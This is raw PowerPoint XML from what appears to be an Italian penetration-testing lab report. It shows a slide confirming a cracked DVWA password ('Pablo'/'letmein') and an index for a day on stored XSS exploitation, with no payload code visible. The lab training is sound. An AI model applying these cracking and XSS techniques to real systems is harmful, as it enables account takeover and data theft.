          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 9" id="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0" id="1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1" id="11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="5400000">
              <a:off x="-661670" y="1183640"/>
              <a:ext cx="6043930" cy="4207510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="4207510" w="6043930">
                  <a:moveTo>
                    <a:pt x="5942330" y="1270"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5998210" y="1270"/>
                    <a:pt x="6043930" y="46990"/>
                    <a:pt x="6043930" y="102870"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6043930" y="4105910"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6043930" y="4161790"/>
                    <a:pt x="5998210" y="4207510"/>
                    <a:pt x="5942330" y="4207510"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="101600" y="4207510"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="45720" y="4207510"/>
                    <a:pt x="0" y="4161790"/>
                    <a:pt x="0" y="4105910"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="101600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="45720"/>
                    <a:pt x="45720" y="0"/>
                    <a:pt x="101600" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5942330" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect l="0" t="-1282" r="0" b="-1281"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 12" id="1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3" id="1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4" id="1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5" id="1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6" id="1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7" id="1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8" id="1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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="311735" y="3264831"/>
            <a:ext cx="4764699" cy="4463538"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1451865" cy="1360097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1451864" cy="1360097"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1360097" w="1451864">
                  <a:moveTo>
                    <a:pt x="40621" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1411243" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1422017" y="0"/>
                    <a:pt x="1432349" y="4280"/>
                    <a:pt x="1439967" y="11898"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1447585" y="19516"/>
                    <a:pt x="1451864" y="29848"/>
                    <a:pt x="1451864" y="40621"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1451864" y="1319476"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1451864" y="1330249"/>
                    <a:pt x="1447585" y="1340581"/>
                    <a:pt x="1439967" y="1348199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432349" y="1355817"/>
                    <a:pt x="1422017" y="1360097"/>
                    <a:pt x="1411243" y="1360097"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="40621" y="1360097"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="29848" y="1360097"/>
                    <a:pt x="19516" y="1355817"/>
                    <a:pt x="11898" y="1348199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4280" y="1340581"/>
                    <a:pt x="0" y="1330249"/>
                    <a:pt x="0" y="1319476"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="40621"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="29848"/>
                    <a:pt x="4280" y="19516"/>
                    <a:pt x="11898" y="11898"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19516" y="4280"/>
                    <a:pt x="29848" y="0"/>
                    <a:pt x="40621" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 22" id="22"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1451865" cy="1407722"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3079"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 23" id="23"/>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AutoShape 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14807196" y="642843"/>
            <a:ext cx="4369456" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="656593" y="3360081"/>
            <a:ext cx="4047735" cy="4225413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per verificare se la password craccata relativa all'utente Pablo è corretta,  inseriamo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Pablo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>" come username e "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>" come password e clicchiamo su login. Se il login avviene con successo vedremo il nome utente Pablo in basso a sinistra della pagina DVWA, questo significa che le credenziali sono corrette e che l’utente Pablo ha accesso alla piattaforma. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1559034" y="424710"/>
            <a:ext cx="15168103"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4.5 - VERIFICA CREDENZIALI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 27" id="27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14672132" y="869499"/>
            <a:ext cx="2684358" cy="8178250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8178250" w="2684358">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2684357" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684357" y="8178250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8178250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12586025"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9" id="29"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 1</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219042" y="442756"/>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0386903" y="2975811"/>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2110547" y="3815306"/>
            <a:ext cx="14768151" cy="2118334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>GIORNO   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>2</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2" id="22"/>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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4659592" y="6724069"/>
            <a:ext cx="14768151" cy="1177056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>WEB APPLICATION </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>EXPLOIT XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>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5868" y="-635766"/>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94065" y="44628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9954" y="763155"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15751273" y="-1086697"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3796150" y="763155"/>
            <a:ext cx="13253600" cy="8642702"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3490660" cy="2276267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3490660" cy="2276267"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2276267" w="3490660">
                  <a:moveTo>
                    <a:pt x="14603" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3476057" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3479930" y="0"/>
                    <a:pt x="3483644" y="1539"/>
                    <a:pt x="3486383" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3489122" y="7016"/>
                    <a:pt x="3490660" y="10730"/>
                    <a:pt x="3490660" y="14603"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3490660" y="2261664"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3490660" y="2269729"/>
                    <a:pt x="3484122" y="2276267"/>
                    <a:pt x="3476057" y="2276267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14603" y="2276267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6538" y="2276267"/>
                    <a:pt x="0" y="2269729"/>
                    <a:pt x="0" y="2261664"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14603"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10730"/>
                    <a:pt x="1539" y="7016"/>
                    <a:pt x="4277" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7016" y="1539"/>
                    <a:pt x="10730" y="0"/>
                    <a:pt x="14603" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3490660" cy="2323892"/>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3908993" y="5077050"/>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2051378" y="3236663"/>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0" r="0" b="-139600"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076046" y="4691551"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057145" y="6635288"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7400818" y="2396558"/>
            <a:ext cx="7786516" cy="6086475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>1 - LABORATORIO VIRTUALE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.1 - Configurazione Macchina Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.2 - Configurazione Macchina Metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    1.3 - Verifica Comunicazione Macchine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>2 - CONFIGURAZIONE DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>3 - XSS/XSS stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.1 - Panoramica XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.2 - Panoramica Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.3 - Verifica della Vulnerabilità</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.4 - Configurazione web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.5 - Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.6 - XSS in azione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4312674" y="1085532"/>
            <a:ext cx="12689927" cy="886461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="-728">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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1" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5575113" y="1955148"/>
            <a:ext cx="10721562" cy="705484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5740"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" spc="-594">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 2 - WEB APPLICATION EXPLOIT XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12469541" y="4691551"/>
            <a:ext cx="4094226" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4114800" w="4094226">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4094226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40942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2590327" y="950176"/>
            <a:ext cx="5511612" cy="738072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6043"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4317">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12080162" y="1531102"/>
            <a:ext cx="5511612" cy="440891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3523"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2517">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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094816" y="788593"/>
            <a:ext cx="5052107" cy="999646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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
